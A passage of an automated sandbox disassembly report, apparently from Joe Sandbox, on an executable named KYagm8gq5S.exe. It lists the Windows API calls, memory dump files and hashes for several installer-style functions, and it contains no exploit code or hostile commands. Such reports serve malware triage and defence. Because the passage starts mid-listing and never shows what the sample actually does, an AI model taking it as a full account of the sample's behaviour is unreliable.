                                    • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B60
                                    • Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B6D
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00402010
                                    • Part of subcall function 004069F3: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401FC4,?,?,?,?,?,?), ref: 00406A04
                                    • Part of subcall function 004069F3: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A26
                                    • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 2972824698-0
                                  • Opcode ID: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                  • Instruction ID: 31278e7032d6d459f1869afa1fc16bf8b986fef5f9539014001fbe5517bff4f7
                                  • Opcode Fuzzy Hash: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                  • Instruction Fuzzy Hash: 83F09672905511DBDB20BBA59A8999E7664DF0031CF21413FF202B25D5CABC4E41EA6E
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 00405776
                                  • GetDlgItem.USER32(?,000003EE), ref: 00405785
                                  • GetClientRect.USER32(?,?), ref: 004057C2
                                  • GetSystemMetrics.USER32(00000002), ref: 004057C9
                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057EA
                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FB
                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040580E
                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581C
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040582F
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405851
                                  • ShowWindow.USER32(?,00000008), ref: 00405865
                                  • GetDlgItem.USER32(?,000003EC), ref: 00405886
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405896
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058AF
                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BB
                                  • GetDlgItem.USER32(?,000003F8), ref: 00405794
                                    • Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                  • GetDlgItem.USER32(?,000003EC), ref: 004058D8
                                  • CreateThread.KERNEL32(00000000,00000000,Function_000056AC,00000000), ref: 004058E6
                                  • CloseHandle.KERNEL32(00000000), ref: 004058ED
                                  • ShowWindow.USER32(00000000), ref: 00405911
                                  • ShowWindow.USER32(?,00000008), ref: 00405916
                                  • ShowWindow.USER32(00000008), ref: 00405960
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405994
                                  • CreatePopupMenu.USER32 ref: 004059A5
                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059B9
                                  • GetWindowRect.USER32(?,?), ref: 004059D9
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F2
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2A
                                  • OpenClipboard.USER32(00000000), ref: 00405A3A
                                  • EmptyClipboard.USER32 ref: 00405A40
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4C
                                  • GlobalLock.KERNEL32(00000000), ref: 00405A56
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6A
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A8A
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A95
                                  • CloseClipboard.USER32 ref: 00405A9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                  • Instruction ID: d944e331103d7d797bb7559e04b2c0af071990b1bd98ce6caf222631f3d5da7c
                                  • Opcode Fuzzy Hash: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                  • Instruction Fuzzy Hash: 47B13971900608FFDB11AF60DD85EAE7B79FB48354F10813AFA41B61A0CB788A51DF68
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 00404A13
                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A3D
                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AEE
                                  • CoTaskMemFree.OLE32(00000000), ref: 00404AF9
                                  • lstrcmpiW.KERNEL32(Del,007A1748,00000000,?,?), ref: 00404B2B
                                  • lstrcatW.KERNEL32(?,Del), ref: 00404B37
                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B49
                                    • Part of subcall function 00405B98: GetDlgItemTextW.USER32(?,?,00000400,00404B80), ref: 00405BAB
                                    • Part of subcall function 00406802: CharNextW.USER32(?,*?|<>/":,00000000,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
                                    • Part of subcall function 00406802: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406874
                                    • Part of subcall function 00406802: CharNextW.USER32(?,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
                                    • Part of subcall function 00406802: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C
                                  • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404C0C
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C27
                                    • Part of subcall function 00404D80: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
                                    • Part of subcall function 00404D80: wsprintfW.USER32 ref: 00404E2A
                                    • Part of subcall function 00404D80: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A$Del
                                  • API String ID: 2624150263-2818320640
                                  • Opcode ID: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                  • Instruction ID: db18d61dd8e36d4389a3b44505c0f864e6ca322f8728bcf89e652d7f1c678b9a
                                  • Opcode Fuzzy Hash: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                  • Instruction Fuzzy Hash: 25A185B1900208ABDB11AFA5DD45BEFB7B8EF84314F11403BF611B62D1D77C9A418B69
                                  APIs
                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 0040228E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp
                                  • API String ID: 542301482-843063114
                                  • Opcode ID: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                  • Instruction ID: d027746e191c14b49f1eee61a42344c893d98f4f720128a79e15815c221bbdc7
                                  • Opcode Fuzzy Hash: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                  • Instruction Fuzzy Hash: 3B411675A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                  • Instruction ID: bedb772ef0a2f17f15cc30cd16f16fd49c67dd7be69949238e740b54367540b4
                                  • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                  • Instruction Fuzzy Hash: 08F0E231A04100EAD700EBA4DA499AEB374FF04314F20417BE101F30E0D7B84D409B2D
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F58
                                  • GetDlgItem.USER32(?,00000408), ref: 00404F63
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FAD
                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC4
                                  • SetWindowLongW.USER32(?,000000FC,0040554D), ref: 00404FDD
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF1
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405003
                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405019
                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405025
                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405037
                                  • DeleteObject.GDI32(00000000), ref: 0040503A
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405065
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405071
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510C
                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513C
                                    • Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405150
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040517E
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518C
                                  • ShowWindow.USER32(?,00000005), ref: 0040519C
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405297
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FC
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405311
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405335
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405355
                                  • ImageList_Destroy.COMCTL32(?), ref: 0040536A
                                  • GlobalFree.KERNEL32(?), ref: 0040537A
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F3
                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040549C
                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AB
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D6
                                  • ShowWindow.USER32(?,00000000), ref: 00405524
                                  • GetDlgItem.USER32(?,000003FE), ref: 0040552F
                                  • ShowWindow.USER32(00000000), ref: 00405536
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 2564846305-813528018
                                  • Opcode ID: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                  • Instruction ID: 3f60975f1bbea04172c566a814ac76c3bf8fe72ba7ce1bc18d7d222ec834a39f
                                  • Opcode Fuzzy Hash: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                  • Instruction Fuzzy Hash: B2027870900609AFDF20DF65DC85AAF7BB5FB85314F10816AFA10BA2E1D7798A41CF58
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                  • ShowWindow.USER32(?), ref: 00404030
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                  • ShowWindow.USER32(?,00000004), ref: 0040405B
                                  • DestroyWindow.USER32 ref: 0040406F
                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
                                  • GetDlgItem.USER32(?,?), ref: 004040A7
                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                  • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                  • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                  • GetDlgItem.USER32(?,00000002), ref: 00404177
                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                  • GetDlgItem.USER32(?,00000003), ref: 00404288
                                  • ShowWindow.USER32(00000000,?), ref: 004042A9
                                  • EnableWindow.USER32(?,?), ref: 004042BB
                                  • EnableWindow.USER32(?,?), ref: 004042D6
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
                                  • EnableMenuItem.USER32(00000000), ref: 004042F3
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                  • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                  • SetWindowTextW.USER32(?,007A1748), ref: 0040435C
                                  • ShowWindow.USER32(?,0000000A), ref: 00404490
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                  • String ID:
                                  • API String ID: 1860320154-0
                                  • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                  • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                  • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                  • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E
                                  APIs
                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404730
                                  • GetDlgItem.USER32(?,000003E8), ref: 00404744
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404761
                                  • GetSysColor.USER32(?), ref: 00404772
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404780
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040478E
                                  • lstrlenW.KERNEL32(?), ref: 00404793
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A0
                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B5
                                  • GetDlgItem.USER32(?,0000040A), ref: 0040480E
                                  • SendMessageW.USER32(00000000), ref: 00404815
                                  • GetDlgItem.USER32(?,000003E8), ref: 00404840
                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404883
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404891
                                  • SetCursor.USER32(00000000), ref: 00404894
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004048AD
                                  • SetCursor.USER32(00000000), ref: 004048B0
                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048DF
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: F@$Del$N
                                  • API String ID: 3103080414-4255390987
                                  • Opcode ID: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                  • Instruction ID: 45fb83ade45cfc86163e6b15eb7062ba83955ff26de70ff6e3d1e782862a206c
                                  • Opcode Fuzzy Hash: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                  • Instruction Fuzzy Hash: 1861A2B1900209BFDF10AF60DD85A6A7B69FB85314F00843AF705B62E0C778AD51CFA9
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                  • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                    • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                    • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                  • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                  • wsprintfA.USER32 ref: 00406219
                                  • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406254
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406263
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                  • GlobalFree.KERNEL32(00000000), ref: 00406302
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406309
                                    • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00406048
                                    • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                                  • API String ID: 2171350718-3350566011
                                  • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                  • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                  • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                  • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                  APIs
                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
